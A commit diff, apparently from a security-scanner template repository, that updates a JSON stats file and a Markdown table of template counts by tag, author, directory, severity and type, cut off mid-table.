gajbhiye","count":1},{"name":"_harleo","count":1},{"name":"zandros0","count":1},{"name":"me9187","count":1},{"name":"becivells","count":1},{"name":"alex","count":1},{"name":"andirrahmani1","count":1},{"name":"pudsec","count":1},{"name":"0ut0fb4nd","count":1},{"name":"c3l3si4n","count":1},{"name":"ohlinge","count":1},{"name":"pdp","count":1},{"name":"yavolo","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"noamrathaus","count":1},{"name":"forgedhallpass","count":1},{"name":"naglinagli","count":1},{"name":"ajaysenr","count":1},{"name":"borna nematzadeh","count":1},{"name":"wabafet","count":1},{"name":"@dwisiswant0","count":1},{"name":"daviey","count":1},{"name":"rodnt","count":1},{"name":"kareemse1im","count":1},{"name":"luskabol","count":1},{"name":"affix","count":1},{"name":"elder tao","count":1},{"name":"shreyapohekar","count":1},{"name":"brabbit10","count":1},{"name":"mhdsamx","count":1},{"name":"gboddin","count":1},{"name":"qlkwej","count":1},{"name":"manuelbua","count":1},{"name":"ringo","count":1},{"name":"absshax","count":1},{"name":"furkansenan","count":1},{"name":"infosecsanyam","count":1},{"name":"fmunozs","count":1},{"name":"nytr0gen","count":1},{"name":"0xrod","count":1},{"name":"izn0u","count":1},{"name":"smaranchand","count":1},{"name":"notsoevilweasel","count":1},{"name":"flag007","count":1},{"name":"undefl0w","count":1},{"name":"hanlaomo","count":1},{"name":"cookiehanhoan","count":1},{"name":"shelld3v","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"tirtha_mandal","count":1},{"name":"toufik airane","count":1},{"name":"ahmed sherif","count":1},{"name":"sickwell","count":1},{"name":"sshell","count":1},{"name":"tim_koopmans","count":1},{"name":"sullo","count":1},{"name":"jteles","count":1},{"name":"alph4byt3","count":1},{"name":"b0yd","count":1},{"name":"ipanda","count":1},{"name":"its0x08","count":1},{"name":"remonsec","count":1},{"name":"sicksec","count":1},{"name":"exploitation","count":1},{"name":"j33n1k4","count":1},{"name":"omarkurt","count":1},{"name":"_c0wb0y_","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"fopina","count":1},{"name":"luci","count":1},{"name":"patralos","count":1},{"name":"blckraven","count":1},{"name":"kurohost","count":1},{"name":"intx0x80","count":1},{"name":"philippdelteil","count":1},{"name":"akash.c","count":1},{"name":"oscarintherocks","count":1},{"name":"mubassirpatel","count":1},{"name":"rotemreiss","count":1},{"name":"soyelmago","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"elmahdi","count":1},{"name":"yashgoti","count":1},{"name":"yashanand155","count":1},{"name":"0xtavian","count":1},{"name":"pratik khalane","count":1},{"name":"akshansh","count":1},{"name":"ahmetpergamum","count":1},{"name":"kre80r","count":1},{"name":"elouhi","count":1},{"name":"b0rn2r00t","count":1},{"name":"0xteles","count":1},{"name":"mesaglio","count":1},{"name":"ldionmarcil","count":1},{"name":"jeya seelan","count":1},{"name":"raesene","count":1},{"name":"revblock","count":1},{"name":"andysvints","count":1},{"name":"bjhulst","count":1},{"name":"th3.d1p4k","count":1},{"name":"chron0x","count":1},{"name":"evolutionsec","count":1},{"name":"juicypotato1","count":1},{"name":"divya_mudgal","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"kabirsuda","count":1},{"name":"dawid-czarnecki","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"aresx","count":1},{"name":"apt-mirror","count":1},{"name":"mass0ma","count":1},{"name":"makyotox","count":1},{"name":"micha3lb3n","count":1},{"name":"thevillagehacker","count":1},{"name":"schniggie","count":1},{"name":"iampritam","count":1},{"name":"sy3omda","count":1}],"directory":[{"name":"cves","count":804},{"name":"vulnerabilities","count":311},{"name":"exposed-panels","count":250},{"name":"technologies","count":200},{"name":"exposures","count":188},{"name":"misconfiguration","count":136},{"name":"takeovers","count":64},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":37},{"name":"network","count":34},{"name":"iot","count":25},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":661},{"name":"high","count":621},{"name":"medium","count":463},{"name":"critical","count":275},{"name":"low","count":154}],"types":[{"name":"http","count":2068},{"name":"file","count":46},{"name":"network","count":43},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index aae0af0a71..8dbda1cd09 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,19 +1,19 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 803 | daffainfo | 280 | cves | 803 | info | 660 | http | 2067 | -| lfi | 325 | pikpikcu | 277 | vulnerabilities | 312 | high | 620 | file | 46 | +| cve | 804 | daffainfo | 280 | cves | 804 | info | 661 | http | 2068 | +| lfi | 325 | pikpikcu | 277 | vulnerabilities | 311 | high | 621 | file | 46 | | xss | 253 | dhiyaneshdk | 268 | exposed-panels | 250 | medium | 463 | network | 43 | -| panel | 252 | pdteam | 199 | technologies | 199 | critical | 276 | dns | 12 | +| panel | 252 | pdteam | 199 | technologies | 200 | critical | 275 | dns | 12 | | wordpress | 241 | geeknik | 154 | exposures | 188 | low | 154 | | | | exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | | rce | 200 | gy741 | 77 | takeovers | 64 | | | | | -| tech | 190 | pussycat0x | 70 | default-logins | 56 | | | | | +| tech | 191 | pussycat0x | 70 | default-logins | 56 | | | | | | wp-plugin | 167 | princechaddha | 63 | file | 46 | | | | | | cve2020 | 164 | madrobot | 61 | workflows | 37 | | | | | | cve2021 | 139 | 0x_akoko | 43 | network | 34 | | | | | | joomla | 128 | gaurang | 42 | iot | 25 | | | | | | cve2010 | 108 | philippedelteil | 27 | miscellaneous | 24 | | | | | -| cve2019 | 96 | ice3man | 26 | dns | 12 | | | | | +| cve2019 | 97 | ice3man | 26 | dns | 12 | | | | | | config | 94 | organiccrap | 24 | fuzzing | 10 | | | | | | cve2018 | 86 | sheikhrishad | 15 | cnvd | 9 | | | | | | apache | 70 | milo2012 | 14 | headless | 5 | | | | | @@ -22,808 +22,809 @@ | token | 65 | suman_kar | 12 | | | | | | | | default-login | 64 | cyllective | 11 | | | | | | | | oob | 57 | r3dg33k | 11 | | | | | | | -| cve2017 | 50 | random_robbie | 10 | | | | | | | -| unauth | 47 | righettod | 10 | | | | | | | -| file | 46 | wdahlenb | 10 | | | | | | | +| cve2017 | 50 | righettod | 10 | | | | | | | +| unauth | 47 | wdahlenb | 10 | | | | | | | +| file | 46 | random_robbie | 10 | | | | | | | | network | 43 | nadino | 9 | | | | | | | -| ssrf | 40 | melbadry9 | 9 | | | | | | | -| sqli | 38 | hackergautam | 9 | | | | | | | -| | 37 | that_juan_ | 8 | | | | | | | -| oracle | 36 | iamthefrogy | 8 | | | | | | | +| ssrf | 40 | hackergautam | 9 | | | | | | | +| sqli | 38 | melbadry9 | 9 | | | | | | | +| | 37 | iamthefrogy | 8 | | | | | | | | cve2016 | 36 | aashiq | 8 | | | | | | | -| redirect | 34 | 0x240x23elu | 7 | | | | | | | +| oracle | 36 | that_juan_ | 8 | | | | | | | +| redirect | 34 | meme-lord | 7 | | | | | | | | logs | 30 | harshbothra_ | 7 | | | | | | | -| jira | 28 | dr_set | 7 | | | | | | | +| jira | 28 | oppsec | 7 | | | | | | | | cve2014 | 27 | emadshanab | 7 | | | | | | | -| atlassian | 27 | kophjager007 | 7 | | | | | | | -| listing | 27 | meme-lord | 7 | | | | | | | +| atlassian | 27 | dogasantos | 7 | | | | | | | +| listing | 27 | dr_set | 7 | | | | | | | | cve2015 | 26 | randomstr1ng | 7 | | | | | | | -| generic | 23 | oppsec | 7 | | | | | | | -| auth-bypass | 23 | techryptic (@tech) | 7 | | | | | | | -| misc | 23 | dogasantos | 7 | | | | | | | -| disclosure | 22 | pentest_swissky | 6 | | | | | | | -| router | 20 | caspergn | 6 | | | | | | | +| generic | 23 | techryptic (@tech) | 7 | | | | | | | +| misc | 23 | kophjager007 | 7 | | | | | | | +| auth-bypass | 23 | 0x240x23elu | 7 | | | | | | | +| disclosure | 22 | caspergn | 6 | | | | | | | +| router | 20 | logicalhunter | 6 | | | | | | | +| aem | 19 | pentest_swissky | 6 | | | | | | | | cisco | 19 | puzzlepeaches | 6 | | | | | | | -| aem | 19 | logicalhunter | 6 | | | | | | | -| misconfig | 18 | __fazal | 6 | | | | | | | -| debug | 18 | yanyun | 5 | | | | | | | -| springboot | 18 | ganofins | 5 | | | | | | | +| debug | 18 | __fazal | 6 | | | | | | | +| springboot | 18 | rootxharsh | 5 | | | | | | | +| misconfig | 18 | elsfa7110 | 5 | | | | | | | | sap | 18 | panch0r3d | 5 | | | | | | | -| cve2012 | 17 | elsfa7110 | 5 | | | | | | | +| cve2012 | 17 | yanyun | 5 | | | | | | | | php | 16 | iamnoooob | 5 | | | | | | | -| cve2011 | 15 | rootxharsh | 5 | | | | | | | -| fuzz | 14 | lu4nx | 5 | | | | | | | -| struts | 14 | joanbono | 5 | | | | | | | -| cve2009 | 14 | nodauf | 4 | | | | | | | -| login | 14 | xelkomy | 4 | | | | | | | -| weblogic | 14 | e_schultze_ | 4 | | | | | | | -| dns | 13 | github.com/its0x08 | 4 | | | | | | | -| android | 13 | f1tz | 3 | | | | | | | -| zoho | 13 | shifacyclewala | 3 | | | | | | | -| adobe | 13 | fyoorer | 3 | | | | | | | -| devops | 13 | sushantkamble | 3 | | | | | | | -| dlink | 12 | incogbyte | 3 | | | | | | | +| cve2011 | 15 | ganofins | 5 | | | | | | | +| login | 14 | lu4nx | 5 | | | | | | | +| weblogic | 14 | joanbono | 5 | | | | | | | +| cve2009 | 14 | e_schultze_ | 4 | | | | | | | +| struts | 14 | github.com/its0x08 | 4 | | | | | | | +| fuzz | 14 | nodauf | 4 | | | | | | | +| adobe | 13 | xelkomy | 4 | | | | | | | +| zoho | 13 | yash anand @yashanand155 | 3 | | | | | | | +| android | 13 | shine | 3 | | | | | | | +| dns | 13 | jarijaas | 3 | | | | | | | +| devops | 13 | _generic_human_ | 3 | | | | | | | | jenkins | 12 | johnk3r | 3 | | | | | | | -| manageengine | 12 | _generic_human_ | 3 | | | | | | | -| aws | 12 | z3bd | 3 | | | | | | | -| cve2013 | 11 | 0w4ys | 3 | | | | | | | -| wp-theme | 11 | dudez | 3 | | | | | | | -| xxe | 10 | thomas_from_offensity | 3 | | | | | | | -| dell | 10 | binaryfigments | 3 | | | | | | | -| magento | 9 | tess | 3 | | | | | | | -| intrusive | 9 | skeltavik | 3 | | | | | | | -| ftp | 9 | impramodsargar | 3 | | | | | | | -| vmware | 9 | yash anand @yashanand155 | 3 | | | | | | | -| nginx | 8 | unstabl3 | 3 | | | | | | | -| cve2008 | 8 | vsh00t | 3 | | | | | | | -| gitlab | 8 | emenalf | 3 | | | | | | | -| rails | 8 | shine | 3 | | | | | | | -| airflow | 8 | idealphase | 3 | | | | | | | +| manageengine | 12 | impramodsargar | 3 | | | | | | | +| aws | 12 | skeltavik | 3 | | | | | | | +| dlink | 12 | unstabl3 | 3 | | | | | | | +| wp-theme | 11 | idealphase | 3 | | | | | | | +| cve2013 | 11 | sushantkamble | 3 | | | | | | | +| xxe | 10 | 0w4ys | 3 | | | | | | | +| dell | 10 | emenalf | 3 | | | | | | | +| ftp | 9 | fyoorer | 3 | | | | | | | +| intrusive | 9 | thomas_from_offensity | 3 | | | | | | | +| magento | 9 | shifacyclewala | 3 | | | | | | | +| vmware | 9 | binaryfigments | 3 | | | | | | | | ruijie | 8 | mavericknerd | 3 | | | | | | | -| scada | 8 | jarijaas | 3 | | | | | | | -| cnvd | 8 | randomrobbie | 2 | | | | | | | -| confluence | 7 | moritz nentwig | 2 | | | | | | | -| cms | 7 | g4l1t0 | 2 | | | | | | | -| coldfusion | 7 | bsysop | 2 | | | | | | | -| ibm | 7 | hetroublemakr | 2 | | | | | | | -| netgear | 7 | huowuzhao | 2 | | | | | | | -| files | 7 | dheerajmadhukar | 2 | | | | | | | -| google | 7 | 0xcrypto | 2 | | | | | | | -| backup | 7 | random-robbie | 2 | | | | | | | -| microsoft | 7 | nkxxkn | 2 | | | | | | | -| kubernetes | 7 | r3naissance | 2 | | | | | | | -| laravel | 6 | udit_thakkur | 2 | | | | | | | -| camera | 6 | joeldeleep | 2 | | | | | | | -| solr | 6 | 0xsmiley | 2 | | | | | | | -| hp | 6 | lotusdll | 2 | | | | | | | -| jetty | 6 | w4cky_ | 2 | | | | | | | -| docker | 6 | ehsahil | 2 | | | | | | | -| api | 6 | johnjhacking | 2 | | | | | | | -| rconfig | 6 | foulenzer | 2 | | | | | | | -| django | 6 | manas_harsh | 2 | | | | | | | -| citrix | 6 | 0xsapra | 2 | | | | | | | -| deserialization | 5 | davidmckennirey | 2 | | | | | | | -| iis | 5 | socketz | 2 | | | | | | | -| windows | 5 | hahwul | 2 | | | | | | | -| lucee | 5 | gal nagli | 2 | | | | | | | -| drupal | 5 | afaq | 2 | | | | | | | -| phpmyadmin | 5 | kiblyn11 | 2 | | | | | | | -| circarlife | 5 | x1m_martijn | 2 | | | | | | | -| ssti | 5 | pxmme1337 | 2 | | | | | | | -| dedecms | 5 | bp0lr | 2 | | | | | | | -| fileupload | 5 | arcc | 2 | | | | | | | -| jolokia | 5 | convisoappsec | 2 | | | | | | | -| headless | 5 | parth | 2 | | | | | | | -| nodejs | 5 | 0xprial | 2 | | | | | | | -| tomcat | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| printer | 5 | bernardofsr | 2 | | | | | | | -| java | 5 | alifathi-h1 | 2 | | | | | | | -| elastic | 4 | swissky | 2 | | | | | | | -| solarwinds | 4 | fabaff | 2 | | | | | | | -| samsung | 4 | whoever | 2 | | | | | | | -| hongdian | 4 | amsda | 2 | | | | | | | -| vpn | 4 | koti2 | 2 | | | | | | | -| firmware | 4 | bing0o | 2 | | | | | | | -| buffalo | 4 | cocxanh | 2 | | | | | | | -| grafana | 4 | vavkamil | 2 | | | | | | | -| moodle | 4 | gevakun | 2 | | | | | | | -| fatpipe | 4 | 0xrudra | 2 | | | | | | | -| webserver | 4 | ree4pwn | 2 | | | | | | | -| git | 4 | mohammedsaneem | 2 | | | | | | | -| artifactory | 4 | zomsop82 | 2 | | | | | | | -| symfony | 4 | 0xelkomy | 2 | | | | | | | -| zimbra | 4 | ratnadip gajbhiye | 1 | | | | | | | -| traversal | 4 | thevillagehacker | 1 | | | | | | | -| symantec | 4 | _darrenmartyn | 1 | | | | | | | -| magmi | 4 | kishore krishna (sillydaddy) | 1 | | | | | | | -| proxy | 4 | defr0ggy | 1 | | | | | | | -| asp | 4 | aresx | 1 | | | | | | | -| wso2 | 4 | elouhi | 1 | | | | | | | -| thinkphp | 4 | @github.com/defr0ggy | 1 | | | | | | | -| crlf | 4 | soyelmago | 1 | | | | | | | -| thinkcmf | 4 | j33n1k4 | 1 | | | | | | | -| strapi | 4 | luskabol | 1 | | | | | | | -| glpi | 4 | ajaysenr | 1 | | | | | | | -| rfi | 4 | retr0 | 1 | | | | | | | -| resin | 4 | sshell | 1 | | | | | | | -| exchange | 4 | ooooooo_q | 1 | | | | | | | -| zabbix | 4 | smaranchand | 1 | | | | | | | -| itop | 3 | tirtha_mandal | 1 | | | | | | | -| oa | 3 | 0xteles | 1 | | | | | | | -| caucho | 3 | affix | 1 | | | | | | | -| springcloud | 3 | x6263 | 1 | | | | | | | -| httpd | 3 | sec_hawk | 1 | | | | | | | -| linkerd | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| openssh | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| jellyfin | 3 | naglinagli | 1 | | | | | | | -| amazon | 3 | 0h1in9e | 1 | | | | | | | -| log | 3 | furkansenan | 1 | | | | | | | -| mongodb | 3 | toufik airane | 1 | | | | | | | -| ebs | 3 | taielab | 1 | | | | | | | -| slack | 3 | ringo | 1 | | | | | | | -| microstrategy | 3 | rojanrijal | 1 | | | | | | | -| lfr | 3 | manuelbua | 1 | | | | | | | -| vbulletin | 3 | ohlinge | 1 | | | | | | | -| opensis | 3 | flag007 | 1 | | | | | | | -| jeesns | 3 | philippdelteil | 1 | | | | | | | -| injection | 3 | mhdsamx | 1 | | | | | | | -| zhiyuan | 3 | ahmed sherif | 1 | | | | | | | -| kibana | 3 | b4uh0lz | 1 | | | | | | | -| npm | 3 | aceseven (digisec360) | 1 | | | | | | | -| bitrix | 3 | berkdusunur | 1 | | | | | | | -| smtp | 3 | infosecsanyam | 1 | | | | | | | -| kafka | 3 | mah3sec_ | 1 | | | | | | | -| openam | 3 | d0rkerdevil | 1 | | | | | | | -| backups | 3 | sicksec | 1 | | | | | | | -| ssh | 3 | cookiehanhoan | 1 | | | | | | | -| cacti | 3 | udyz | 1 | | | | | | | -| ofbiz | 3 | blckraven | 1 | | | | | | | -| bigip | 3 | notsoevilweasel | 1 | | | | | | | -| targa | 3 | @dwisiswant0 | 1 | | | | | | | -| nacos | 3 | _harleo | 1 | | | | | | | -| cve2007 | 3 | pratik khalane | 1 | | | | | | | -| r-seenet | 3 | mesaglio | 1 | | | | | | | -| terramaster | 3 | mubassirpatel | 1 | | | | | | | -| tikiwiki | 3 | chron0x | 1 | | | | | | | -| nosqli | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| prometheus | 3 | luci | 1 | | | | | | | -| azure | 3 | kba@sogeti_esec | 1 | | | | | | | -| hoteldruid | 3 | thezakman | 1 | | | | | | | -| firebase | 3 | andirrahmani1 | 1 | | | | | | | -| nexus | 3 | pudsec | 1 | | | | | | | -| telerik | 3 | juicypotato1 | 1 | | | | | | | -| fpd | 3 | yashanand155 | 1 | | | | | | | -| backdoor | 3 | bernardo rodrigues | 1 | | | | | | | +| rails | 8 | vsh00t | 3 | | | | | | | +| airflow | 8 | z3bd | 3 | | | | | | | +| scada | 8 | tess | 3 | | | | | | | +| nginx | 8 | f1tz | 3 | | | | | | | +| cve2008 | 8 | incogbyte | 3 | | | | | | | +| cnvd | 8 | dudez | 3 | | | | | | | +| gitlab | 8 | foulenzer | 2 | | | | | | | +| files | 7 | koti2 | 2 | | | | | | | +| microsoft | 7 | 0xelkomy | 2 | | | | | | | +| cms | 7 | mohammedsaneem | 2 | | | | | | | +| netgear | 7 | fabaff | 2 | | | | | | | +| confluence | 7 | gal nagli | 2 | | | | | | | +| google | 7 | afaq | 2 | | | | | | | +| coldfusion | 7 | vavkamil | 2 | | | | | | | +| kubernetes | 7 | kiblyn11 | 2 | | | | | | | +| ibm | 7 | huowuzhao | 2 | | | | | | | +| backup | 7 | dheerajmadhukar | 2 | | | | | | | +| solr | 6 | hetroublemakr | 2 | | | | | | | +| laravel | 6 | alifathi-h1 | 2 | | | | | | | +| jetty | 6 | 0xprial | 2 | | | | | | | +| docker | 6 | convisoappsec | 2 | | | | | | | +| rconfig | 6 | zomsop82 | 2 | | | | | | | +| citrix | 6 | w4cky_ | 2 | | | | | | | +| api | 6 | gevakun | 2 | | | | | | | +| hp | 6 | cocxanh | 2 | | | | | | | +| camera | 6 | arcc | 2 | | | | | | | +| django | 6 | joeldeleep | 2 | | | | | | | +| fileupload | 5 | udit_thakkur | 2 | | | | | | | +| headless | 5 | pxmme1337 | 2 | | | | | | | +| dedecms | 5 | 0xrudra | 2 | | | | | | | +| nodejs | 5 | bp0lr | 2 | | | | | | | +| circarlife | 5 | whoever | 2 | | | | | | | +| printer | 5 | amsda | 2 | | | | | | | +| iis | 5 | 0xsmiley | 2 | | | | | | | +| drupal | 5 | g4l1t0 | 2 | | | | | | | +| ssti | 5 | randomrobbie | 2 | | | | | | | +| lucee | 5 | 0xsapra | 2 | | | | | | | +| phpmyadmin | 5 | random-robbie | 2 | | | | | | | +| deserialization | 5 | socketz | 2 | | | | | | | +| jolokia | 5 | bing0o | 2 | | | | | | | +| tomcat | 5 | r3naissance | 2 | | | | | | | +| java | 5 | johnjhacking | 2 | | | | | | | +| windows | 5 | manas_harsh | 2 | | | | | | | +| webserver | 4 | ehsahil | 2 | | | | | | | +| thinkphp | 4 | ree4pwn | 2 | | | | | | | +| zimbra | 4 | swissky | 2 | | | | | | | +| symfony | 4 | moritz nentwig | 2 | | | | | | | +| rfi | 4 | nkxxkn | 2 | | | | | | | +| artifactory | 4 | 0xcrypto | 2 | | | | | | | +| hongdian | 4 | bernardofsr | 2 | | | | | | | +| git | 4 | hahwul | 2 | | | | | | | +| exchange | 4 | bsysop | 2 | | | | | | | +| thinkcmf | 4 | parth | 2 | | | | | | | +| buffalo | 4 | lotusdll | 2 | | | | | | | +| vpn | 4 | davidmckennirey | 2 | | | | | | | +| wso2 | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| glpi | 4 | x1m_martijn | 2 | | | | | | | +| grafana | 4 | 0h1in9e | 1 | | | | | | | +| resin | 4 | 0ut0fb4nd | 1 | | | | | | | +| strapi | 4 | ahmed sherif | 1 | | | | | | | +| proxy | 4 | philippdelteil | 1 | | | | | | | +| elastic | 4 | geraldino2 | 1 | | | | | | | +| crlf | 4 | sullo | 1 | | | | | | | +| traversal | 4 | _darrenmartyn | 1 | | | | | | | +| samsung | 4 | me9187 | 1 | | | | | | | +| solarwinds | 4 | push4d | 1 | | | | | | | +| zabbix | 4 | hakluke | 1 | | | | | | | +| symantec | 4 | sicksec | 1 | | | | | | | +| magmi | 4 | rojanrijal | 1 | | | | | | | +| asp | 4 | un-fmunozs | 1 | | | | | | | +| fatpipe | 4 | willd96 | 1 | | | | | | | +| moodle | 4 | ohlinge | 1 | | | | | | | +| firmware | 4 | noamrathaus | 1 | | | | | | | +| npm | 3 | bjhulst | 1 | | | | | | | +| fanruan | 3 | knassar702 | 1 | | | | | | | +| itop | 3 | nytr0gen | 1 | | | | | | | +| zhiyuan | 3 | kurohost | 1 | | | | | | | +| httpd | 3 | remonsec | 1 | | | | | | | +| r-seenet | 3 | furkansenan | 1 | | | | | | | +| linkerd | 3 | 0xtavian | 1 | | | | | | | +| lfr | 3 | thevillagehacker | 1 | | | | | | | +| openssh | 3 | wabafet | 1 | | | | | | | +| nexus | 3 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| druid | 3 | kabirsuda | 1 | | | | | | | -| fanruan | 3 | geraldino2 | 1 | | | | | | | -| kevinlab | 3 | ahmetpergamum | 1 | | | | | | | -| mail | 3 | raesene | 1 | | | | | | | -| pega | 2 | sy3omda | 1 | | | | | | | -| hashicorp | 2 | aaron_costello | 1 | | | | | | | +| targa | 3 | aaron_costello | 1 | | | | | | | | | | (@conspiracyproof) | | | | | | | | -| phpcollab | 2 | evolutionsec | 1 | | | | | | | -| plesk | 2 | j3ssie/geraldino2 | 1 | | | | | | | -| voipmonitor | 2 | kurohost | 1 | | | | | | | -| kong | 2 | noamrathaus | 1 | | | | | | | -| status | 2 | sickwell | 1 | | | | | | | -| hpe | 2 | becivells | 1 | | | | | | | -| payara | 2 | makyotox | 1 | | | | | | | -| grav | 2 | 0xrod | 1 | | | | | | | -| netsweeper | 2 | akash.c | 1 | | | | | | | -| rockmongo | 2 | rotemreiss | 1 | | | | | | | -| smb | 2 | intx0x80 | 1 | | | | | | | -| prtg | 2 | bolli95 | 1 | | | | | | | -| rstudio | 2 | _c0wb0y_ | 1 | | | | | | | -| mcafee | 2 | shreyapohekar | 1 | | | | | | | -| vcenter | 2 | ldionmarcil | 1 | | | | | | | -| bucket | 2 | akshansh | 1 | | | | | | | -| activemq | 2 | hanlaomo | 1 | | | | | | | -| jsf | 2 | shelld3v | 1 | | | | | | | -| cve2005 | 2 | yashgoti | 1 | | | | | | | -| ilo | 2 | alperenkesk | 1 | | | | | | | -| webcam | 2 | shifacyclewla | 1 | | | | | | | -| favicon | 2 | fmunozs | 1 | | | | | | | -| db | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| minio | 2 | xstp | 1 | | | | | | | -| avantfax | 2 | apt-mirror | 1 | | | | | | | -| couchdb | 2 | mass0ma | 1 | | | | | | | -| middleware | 2 | exploitation | 1 | | | | | | | -| chamilo | 2 | bad5ect0r | 1 | | | | | | | -| mida | 2 | rodnt | 1 | | | | | | | -| ecoa | 2 | th3.d1p4k | 1 | | | | | | | -| chyrp | 2 | dawid-czarnecki | 1 | | | | | | | -| idrac | 2 | qlkwej | 1 | | | | | | | -| yii | 2 | sullo | 1 | | | | | | | -| oauth | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| prometheus | 3 | yashanand155 | 1 | | | | | | | +| smtp | 3 | patralos | 1 | | | | | | | +| injection | 3 | th3.d1p4k | 1 | | | | | | | +| slack | 3 | sy3omda | 1 | | | | | | | +| cacti | 3 | adrianmf | 1 | | | | | | | +| oa | 3 | manuelbua | 1 | | | | | | | +| druid | 3 | luskabol | 1 | | | | | | | +| ebs | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| kafka | 3 | mubassirpatel | 1 | | | | | | | +| hoteldruid | 3 | _harleo | 1 | | | | | | | +| log | 3 | shifacyclewla | 1 | | | | | | | +| tikiwiki | 3 | its0x08 | 1 | | | | | | | +| firebase | 3 | brabbit10 | 1 | | | | | | | +| backups | 3 | ringo | 1 | | | | | | | +| caucho | 3 | fopina | 1 | | | | | | | +| springcloud | 3 | dawid-czarnecki | 1 | | | | | | | +| mail | 3 | sickwell | 1 | | | | | | | +| cve2007 | 3 | @dwisiswant0 | 1 | | | | | | | +| jellyfin | 3 | thezakman | 1 | | | | | | | +| opensis | 3 | vzamanillo | 1 | | | | | | | +| fpd | 3 | undefl0w | 1 | | | | | | | +| nosqli | 3 | tim_koopmans | 1 | | | | | | | +| bitrix | 3 | j3ssie/geraldino2 | 1 | | | | | | | +| microstrategy | 3 | raesene | 1 | | | | | | | +| kevinlab | 3 | elder tao | 1 | | | | | | | +| amazon | 3 | xstp | 1 | | | | | | | +| nacos | 3 | alperenkesk | 1 | | | | | | | +| openam | 3 | j33n1k4 | 1 | | | | | | | +| mongodb | 3 | elmahdi | 1 | | | | | | | +| ofbiz | 3 | chron0x | 1 | | | | | | | +| telerik | 3 | fmunozs | 1 | | | | | | | +| bigip | 3 | s1r1u5_ | 1 | | | | | | | +| jeesns | 3 | b0yd | 1 | | | | | | | +| vbulletin | 3 | @github.com/defr0ggy | 1 | | | | | | | +| terramaster | 3 | streetofhackerr007 | 1 | | | | | | | +| backdoor | 3 | whynotke | 1 | | | | | | | +| azure | 3 | streetofhackerr007 (rohit | 1 | | | | | | | | | | soni) | | | | | | | | -| dos | 2 | iampritam | 1 | | | | | | | -| getsimple | 2 | 52971 | 1 | | | | | | | -| igs | 2 | divya_mudgal | 1 | | | | | | | -| chiyu | 2 | regala_ | 1 | | | | | | | -| bruteforce | 2 | its0x08 | 1 | | | | | | | -| sonicwall | 2 | zhenwarx | 1 | | | | | | | -| hjtcloud | 2 | borna nematzadeh | 1 | | | | | | | -| wordfence | 2 | vzamanillo | 1 | | | | | | | -| geowebserver | 2 | adrianmf | 1 | | | | | | | -| nextcloud | 2 | undefl0w | 1 | | | | | | | -| splunk | 2 | ilovebinbash | 1 | | | | | | | -| linux | 2 | b0rn2r00t | 1 | | | | | | | -| ecology | 2 | deena | 1 | | | | | | | -| waf | 2 | yavolo | 1 | | | | | | | -| prestashop | 2 | pdp | 1 | | | | | | | -| aruba | 2 | 0ut0fb4nd | 1 | | | | | | | -| qcubed | 2 | bjhulst | 1 | | | | | | | -| sharepoint | 2 | c3l3si4n | 1 | | | | | | | -| bypass | 2 | nytr0gen | 1 | | | | | | | -| flir | 2 | alph4byt3 | 1 | | | | | | | -| nagios | 2 | daviey | 1 | | | | | | | -| jboss | 2 | hakluke | 1 | | | | | | | -| axis2 | 2 | ipanda | 1 | | | | | | | -| hasura | 2 | wabafet | 1 | | | | | | | -| showdoc | 2 | knassar702 | 1 | | | | | | | -| sitecore | 2 | willd96 | 1 | | | | | | | -| ec2 | 2 | petruknisme | 1 | | | | | | | -| netis | 2 | elder tao | 1 | | | | | | | -| frp | 2 | tim_koopmans | 1 | | | | | | | -| hostheader-injection | 2 | omarkurt | 1 | | | | | | | -| maian | 2 | oscarintherocks | 1 | | | | | | | -| xxljob | 2 | gboddin | 1 | | | | | | | -| fortios | 2 | brabbit10 | 1 | | | | | | | -| ucmdb | 2 | izn0u | 1 | | | | | | | -| yapi | 2 | jeya seelan | 1 | | | | | | | -| icewarp | 2 | whynotke | 1 | | | | | | | -| guacamole | 2 | andysvints | 1 | | | | | | | -| totemomail | 2 | s1r1u5_ | 1 | | | | | | | -| akamai | 2 | revblock | 1 | | | | | | | -| adminer | 2 | streetofhackerr007 | 1 | | | | | | | -| shellshock | 2 | kareemse1im | 1 | | | | | | | -| aviatrix | 2 | patralos | 1 | | | | | | | -| axis | 2 | fopina | 1 | | | | | | | -| seeyon | 2 | alex | 1 | | | | | | | -| huawei | 2 | kre80r | 1 | | | | | | | -| service | 2 | elmahdi | 1 | | | | | | | -| emerge | 2 | push4d | 1 | | | | | | | -| storage | 2 | nerrorsec | 1 | | | | | | | -| harbor | 2 | absshax | 1 | | | | | | | -| cache | 2 | co0nan | 1 | | | | | | | -| github | 2 | un-fmunozs | 1 | | | | | | | -| nextjs | 2 | remonsec | 1 | | | | | | | -| liferay | 2 | me9187 | 1 | | | | | | | -| commax | 2 | zandros0 | 1 | | | | | | | -| enumeration | 2 | 0xtavian | 1 | | | | | | | -| globalprotect 